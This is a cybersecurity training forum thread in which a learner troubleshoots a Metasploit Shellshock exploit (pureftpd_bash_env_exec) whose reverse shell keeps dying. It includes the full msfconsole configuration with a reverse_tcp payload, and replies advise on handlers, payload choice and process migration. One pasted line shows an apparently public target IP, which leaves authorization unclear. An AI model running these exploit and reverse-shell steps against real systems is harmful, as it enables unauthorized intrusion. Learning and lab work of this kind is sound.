shell and meterpreterAdvanced Penetration Testing Course

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATION
Already a Member Login Here

Home Forums Courses Advanced Penetration Testing Course shell and meterpreter

This topic contains 17 replies, has 6 voices, and was last updated by  omer 6 months, 4 weeks ago.

Viewing 18 posts - 1 through 18 (of 18 total)
  • Author
    Posts
  • #33815

    Zjelko
    Participant

    Hello all,

    I have compromised a test setup with MSF. I can open a SHELL but am not able to open a meterpreter, anyone know what I am missing. I launched the exploit by hand, target was vulnerable and is compromised.

    Thanks

    #33839

    Anonymous

    Did you set meterpreter as the payload? If so, what is the error?

    #33873

    Zjelko
    Participant

    I will copy the error as soon as I am back to work, at home I don’t have acces to the server.

    #33881

    Syn/Ack
    Participant

    In geeneral to make this work:
    Make sure to generate a meterpreter payload (ie windows/meterpreter/reverse_tcp for windows)
    Start a listener in msfconsole: exploit/multi/handler
    Set the same payload in the handler as in the exploit.

    Run the handler first, then fire the exploit.

    Good luck.

    #33954

    Zjelko
    Participant

    Thanks,I forgot to run the handler before the exploit.

    #33966

    Syn/Ack
    Participant

    Makes sense…
    Cool that you got it working! 😀

    #34448

    Zjelko
    Participant

    Now I get this strange error ….. Reason: Died from EOFError ….. H E L P please

    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started bind handler
    msf exploit(pureftpd_bash_env_exec) > sessions

    Active sessions
    ===============

    Id Type Information Connection
    — —- ———– ———-
    1 shell 192.168.1.108:40236 -> 00.00.111.00

    msf exploit(pureftpd_bash_env_exec) > sessions -i 1
    [*] Starting interaction with 1…

    [*] 00.00.111.00 – Command shell session 1 closed. Reason: Died from EOFError

    #34460

    Matt Pardo
    Participant

    Can you post your Show options output? Redact any Internet-facing IPs, of course.

    #34463

    Zjelko
    Participant

    I can, I will rerun the procedure.
    The RHOST number above is of course not real, I replaced it because with a fake one.

    #34471

    Zjelko
    Participant

    use exploit/multi/ftp/pureftpd_bash_env_exec
    msf exploit(pureftpd_bash_env_exec) > set TARGET 1
    TARGET => 1
    msf exploit(pureftpd_bash_env_exec) > set PAYLOAD generic/shell_reverse_tcp
    PAYLOAD => generic/shell_reverse_tcp
    msf exploit(pureftpd_bash_env_exec) > set LHOST 192.168.1.108
    LHOST => 192.168.1.108

    This answer I found myself but it doesn’t help me even a bit:
    EOFError (End of File error), is thrown when you trying to do carry out an operation on a file object that has already referencing to the end of the file. In this example, we are trying to readline when the line doesn’t exist.
    msf exploit(pureftpd_bash_env_exec) > set LPORT 17149
    LPORT => 17149
    msf exploit(pureftpd_bash_env_exec) > set SSLVersion TLS1
    SSLVersion => TLS1
    msf exploit(pureftpd_bash_env_exec) > set RPORT 21
    RPORT => 21
    msf exploit(pureftpd_bash_env_exec) > set SSLVerifyMode PEER
    SSLVerifyMode => PEER
    msf exploit(pureftpd_bash_env_exec) > set VERBOSE 0
    VERBOSE => 0
    msf exploit(pureftpd_bash_env_exec) > set WfsDelay 0
    WfsDelay => 0
    msf exploit(pureftpd_bash_env_exec) > set SSL 0
    SSL => 0
    msf exploit(pureftpd_bash_env_exec) > set ConnectTimeout 10
    ConnectTimeout => 10
    msf exploit(pureftpd_bash_env_exec) > set TCP::send_delay 0
    TCP::send_delay => 0
    msf exploit(pureftpd_bash_env_exec) > set EnableContextEncoding 0
    EnableContextEncoding => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPDEBUG 0
    FTPDEBUG => 0
    msf exploit(pureftpd_bash_env_exec) > set DisablePayloadHandler 0
    DisablePayloadHandler => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPTimeout 16
    FTPTimeout => 16
    msf exploit(pureftpd_bash_env_exec) > set TCP::max_send_size 0
    TCP::max_send_size => 0
    msf exploit(pureftpd_bash_env_exec) > set RHOST 00.00.000.000
    RHOST => 83.96.159.56
    msf exploit(pureftpd_bash_env_exec) > set CMDSTAGER::FLAVOR auto
    CMDSTAGER::FLAVOR => auto
    msf exploit(pureftpd_bash_env_exec) > set RPATH /bin
    RPATH => /bin
    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.1.108:17149

    • This reply was modified 3 years, 5 months ago by  Zjelko.
    #34497

    Matt Pardo
    Participant

    Nothing is obvious from your output. I haven’t seen that error before but that doesn’t mean much. : ) Are you sure the exploit is valid against that host? I would probably just enumerate more and try another attack vector. If there aren’t any then I would probably go through the exploit code and see if I could do it by hand. That way you might be able to see why it is throwing an error and where.

    #34649

    Zjelko
    Participant

    Thanks for your reponse,

    The exploit is valid against the host, it opens a shell but only for 30 seconds. If I type the command to the list the sessions I can see that a session is open. This wouldn’t be the case if the target wasn’t compromised.
    I haven’t figured it out yet, but I will. I am going for the admin account.

    Thanks agian

    #34664

    Syn/Ack
    Participant

    I found that some shells and some exploits don’t really work well together.
    In your output above you use generic/shell_reverse_tcp.

    Maybe give linux/x86/shell_reverse_tcp a try in stead. I’ve been more successful with that one…

    #34709

    manuellito
    Participant

    Hi,
    You should upload an exe payload to the server and run it in order to open a more stable reverse shell.
    I get exactly the same problem with Brainspan 1 (on Vulnhub) last week. I’ve found the shell is more stable if I used a non meterpreter reverse shell but a standart one.

    #34716

    Syn/Ack
    Participant

    Using an executable to setup a reverse meterpreter shell is not always an option… As an alternative, when using meterpreter you could try to do a migration to another process as well. That also often helps a lot.

    However, looking at the provided options Zjelco is not using Meterpreter, but a standard reverse shell: generic/shell_reverse_tcp.

    #34718

    Matt Pardo
    Participant

    Hmm, tough one. I am not sure what set FTPTimeout 16 is but you could play with that. You could tcpdump the entire exploit and see if there is anything obvious in the pcap. Any idea if the ftp server is dying? Have you looked if it has advanced options?

    #34771

    Zjelko
    Participant

    Hello guys,

    Uploading a file isn’t an option yet. I do agree with the both of you and will try to use another
    maybe more stable reverse_shell. Thanks, and I keep you posted

    #195630

    omer
    Participant

    couple of years late, but have you tried setting the handler via netcat, worked for me on a similar case and that solved it.

Viewing 18 posts - 1 through 18 (of 18 total)

You must be logged in to reply to this topic.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel